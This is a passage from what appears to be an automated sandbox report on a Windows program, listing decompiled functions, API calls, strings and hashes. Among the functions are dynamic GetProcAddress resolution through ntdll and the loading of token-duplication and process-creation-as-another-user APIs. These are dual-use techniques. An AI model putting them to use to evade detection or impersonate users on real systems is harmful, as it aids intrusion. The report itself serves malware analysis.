                                                                                                                    0x004092bd
                                                                                                                    0x004092cc
                                                                                                                    0x004092d1
                                                                                                                    0x004092d8
                                                                                                                    0x004092dd
                                                                                                                    0x00409255
                                                                                                                    0x0040925b
                                                                                                                    0x00409269
                                                                                                                    0x00409275
                                                                                                                    0x00409282
                                                                                                                    0x0040928d
                                                                                                                    0x00409292
                                                                                                                    0x004092ec
                                                                                                                    0x004092ef
                                                                                                                    0x004092ef
                                                                                                                    0x00409231
                                                                                                                    0x00409232
                                                                                                                    0x00409233
                                                                                                                    0x00000000
                                                                                                                    0x00409239
                                                                                                                    0x0040921a
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 00409223
                                                                                                                    • wcscpy.MSVCRT ref: 00409233
                                                                                                                      • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                      • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                      • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                    • wcscpy.MSVCRT ref: 00409282
                                                                                                                    • wcscat.MSVCRT ref: 0040928D
                                                                                                                    • memset.MSVCRT ref: 00409269
                                                                                                                      • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                      • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                    • memset.MSVCRT ref: 004092B1
                                                                                                                    • memcpy.MSVCRT ref: 004092CC
                                                                                                                    • wcscat.MSVCRT ref: 004092D8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                    • String ID: \systemroot
                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                    • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                    • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                    • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                    • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 48%
                                                                                                                    			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                    0x00409c73
                                                                                                                    0x00409c7c
                                                                                                                    0x00409c90
                                                                                                                    0x00409c9f
                                                                                                                    0x00409ca2
                                                                                                                    0x00409ca7
                                                                                                                    0x00409ca9
                                                                                                                    0x00409cb1
                                                                                                                    0x00409cc0
                                                                                                                    0x00409cc2
                                                                                                                    0x00409cc7
                                                                                                                    0x00409ccf
                                                                                                                    0x00409cd0
                                                                                                                    0x00409cd7
                                                                                                                    0x00409cd8
                                                                                                                    0x00409cd9
                                                                                                                    0x00409cda
                                                                                                                    0x00409cdc
                                                                                                                    0x00409ce0
                                                                                                                    0x00409ce1
                                                                                                                    0x00409ce9
                                                                                                                    0x00409cf1
                                                                                                                    0x00409cfb
                                                                                                                    0x00409d08
                                                                                                                    0x00409d08
                                                                                                                    0x00000000
                                                                                                                    0x00409d0d
                                                                                                                    0x00409d0f

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                    • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                    • strlen.MSVCRT ref: 00409CE4
                                                                                                                    • strlen.MSVCRT ref: 00409CF1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcstrlen
                                                                                                                    • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                    • API String ID: 1027343248-2054640941
                                                                                                                    • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                    • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                    • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                    • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                    0x004028a3
                                                                                                                    0x004028ab
                                                                                                                    0x004028bd
                                                                                                                    0x004028ca
                                                                                                                    0x004028d7
                                                                                                                    0x004028e3
                                                                                                                    0x004028e6
                                                                                                                    0x004028e8
                                                                                                                    0x00000000
                                                                                                                    0x004028eb
                                                                                                                    0x004028ec

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                    • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                    • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                    • API String ID: 2238633743-1970996977
                                                                                                                    • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                    • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                    • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                    • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 39%
                                                                                                                    			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                    0x004045c2
                                                                                                                    0x004045d1
                                                                                                                    0x004045da
                                                                                                                    0x004045ef
                                                                                                                    0x004045f6
                                                                                                                    0x00404604
                                                                                                                    0x0040460b
                                                                                                                    0x00404610
                                                                                                                    0x00404616
                                                                                                                    0x00404617
                                                                                                                    0x00404618
                                                                                                                    0x00404628
                                                                                                                    0x00404629
                                                                                                                    0x0040462a
                                                                                                                    0x0040462f
                                                                                                                    0x00404630
                                                                                                                    0x00404631
                                                                                                                    0x0040463c
                                                                                                                    0x0040463d
                                                                                                                    0x0040463e
                                                                                                                    0x00404656
                                                                                                                    0x00404662
                                                                                                                    0x0040466b
                                                                                                                    0x0040466d
                                                                                                                    0x0040466e
                                                                                                                    0x00404674
                                                                                                                    0x00404679

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Delete_snwprintfmemset$Close
                                                                                                                    • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                    • API String ID: 1018939227-3575174989
                                                                                                                    • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                    • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                    • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                    • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                    0x0040314a
                                                                                                                    0x00403151
                                                                                                                    0x00403158
                                                                                                                    0x0040315a
                                                                                                                    0x00403162
                                                                                                                    0x00403166
                                                                                                                    0x00403190
                                                                                                                    0x00403190
                                                                                                                    0x00403198
                                                                                                                    0x00403199
                                                                                                                    0x0040319e
                                                                                                                    0x004031bb
                                                                                                                    0x004031a0
                                                                                                                    0x004031ad
                                                                                                                    0x004031b6
                                                                                                                    0x004031b6
                                                                                                                    0x0040319e
                                                                                                                    0x0040316e
                                                                                                                    0x00403176
                                                                                                                    0x0040317c
                                                                                                                    0x0040317f
                                                                                                                    0x0040317f
                                                                                                                    0x00403182
                                                                                                                    0x0040318a
                                                                                                                    0x00000000
                                                                                                                    0x0040318c
                                                                                                                    0x0040318c
                                                                                                                    0x00000000
                                                                                                                    0x0040318c

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                    • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                    • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                    • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                    • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                    • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                    0x00404da9
                                                                                                                    0x00404dbc
                                                                                                                    0x00404dbf
                                                                                                                    0x00404dc6
                                                                                                                    0x00404dcc
                                                                                                                    0x00404dce
                                                                                                                    0x00404de1
                                                                                                                    0x00404deb
                                                                                                                    0x00404df2
                                                                                                                    0x00404df4
                                                                                                                    0x00404df4
                                                                                                                    0x00404e07
                                                                                                                    0x00404e0d
                                                                                                                    0x00404e18
                                                                                                                    0x00404e1c
                                                                                                                    0x00404e1e
                                                                                                                    0x00404e27
                                                                                                                    0x00404e28
                                                                                                                    0x00404e29
                                                                                                                    0x00404e2f
                                                                                                                    0x00404e31
                                                                                                                    0x00404e37
                                                                                                                    0x00404e41
                                                                                                                    0x00404e42
                                                                                                                    0x00404e43
                                                                                                                    0x00404e46
                                                                                                                    0x00404e46
                                                                                                                    0x00404e1c
                                                                                                                    0x00404e4d
                                                                                                                    0x00404e50
                                                                                                                    0x00404e5f
                                                                                                                    0x00404e66
                                                                                                                    0x00404e52
                                                                                                                    0x00404e52
                                                                                                                    0x00404e52
                                                                                                                    0x00404e6d
                                                                                                                    0x00404e70
                                                                                                                    0x00404e85
                                                                                                                    0x00404e85
                                                                                                                    0x00000000
                                                                                                                    0x00404e72
                                                                                                                    0x00404e7b
                                                                                                                    0x00404e80
                                                                                                                    0x00404e83
                                                                                                                    0x00404e87
                                                                                                                    0x00404e89
                                                                                                                    0x00404e8b
                                                                                                                    0x00404e8b
                                                                                                                    0x00404ea8
                                                                                                                    0x00404ea8
                                                                                                                    0x00000000
                                                                                                                    0x00404e83

                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                    • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                    • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                    • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                    • GetWindowRect.USER32 ref: 00404E07
                                                                                                                    • GetParent.USER32(?), ref: 00404E12
                                                                                                                    • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2163313125-0
                                                                                                                    • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                    • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                    • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                    • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                    0x0040639c
                                                                                                                    0x004063a4
                                                                                                                    0x004063b2
                                                                                                                    0x004063c2
                                                                                                                    0x004063d3
                                                                                                                    0x004063dc
                                                                                                                    0x004063eb
                                                                                                                    0x004063f0
                                                                                                                    0x00406401
                                                                                                                    0x00000000
                                                                                                                    0x0040641e
                                                                                                                    0x0040641f

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                    • wcscpy.MSVCRT ref: 004063B2
                                                                                                                    • wcscpy.MSVCRT ref: 004063C2
                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                      • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                    • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                    • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                    • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                    • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                    0x0040adf6
                                                                                                                    0x0040adf8
                                                                                                                    0x0040adfa
                                                                                                                    0x0040adfb
                                                                                                                    0x0040adfb
                                                                                                                    0x0040ae02
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040ae04
                                                                                                                    0x0040ae05
                                                                                                                    0x0040ae6d
                                                                                                                    0x0040ae6e
                                                                                                                    0x0040ae73
                                                                                                                    0x0040ae76
                                                                                                                    0x0040ae7f
                                                                                                                    0x0040ae83
                                                                                                                    0x0040ae86
                                                                                                                    0x00000000
                                                                                                                    0x0040ae86
                                                                                                                    0x0040ae8f
                                                                                                                    0x0040ae0c
                                                                                                                    0x0040ae10
                                                                                                                    0x0040ae1e
                                                                                                                    0x0040ae3b
                                                                                                                    0x0040ae4a
                                                                                                                    0x0040ae65
                                                                                                                    0x0040ae7a
                                                                                                                    0x0040ae7e
                                                                                                                    0x0040ae67
                                                                                                                    0x0040ae67
                                                                                                                    0x0040ae68
                                                                                                                    0x00000000
                                                                                                                    0x0040ae68
                                                                                                                    0x0040ae4c
                                                                                                                    0x0040ae4c
                                                                                                                    0x0040ae4e
                                                                                                                    0x00000000
                                                                                                                    0x0040ae4e
                                                                                                                    0x0040ae3d
                                                                                                                    0x0040ae3d
                                                                                                                    0x0040ae3f
                                                                                                                    0x0040ae53
                                                                                                                    0x0040ae54
                                                                                                                    0x0040ae59
                                                                                                                    0x0040ae5c
                                                                                                                    0x0040ae5c
                                                                                                                    0x0040ae20
                                                                                                                    0x0040ae28
                                                                                                                    0x0040ae2d
                                                                                                                    0x0040ae30
                                                                                                                    0x0040ae30
                                                                                                                    0x0040ae12
                                                                                                                    0x0040ae12
                                                                                                                    0x0040ae13
                                                                                                                    0x00000000
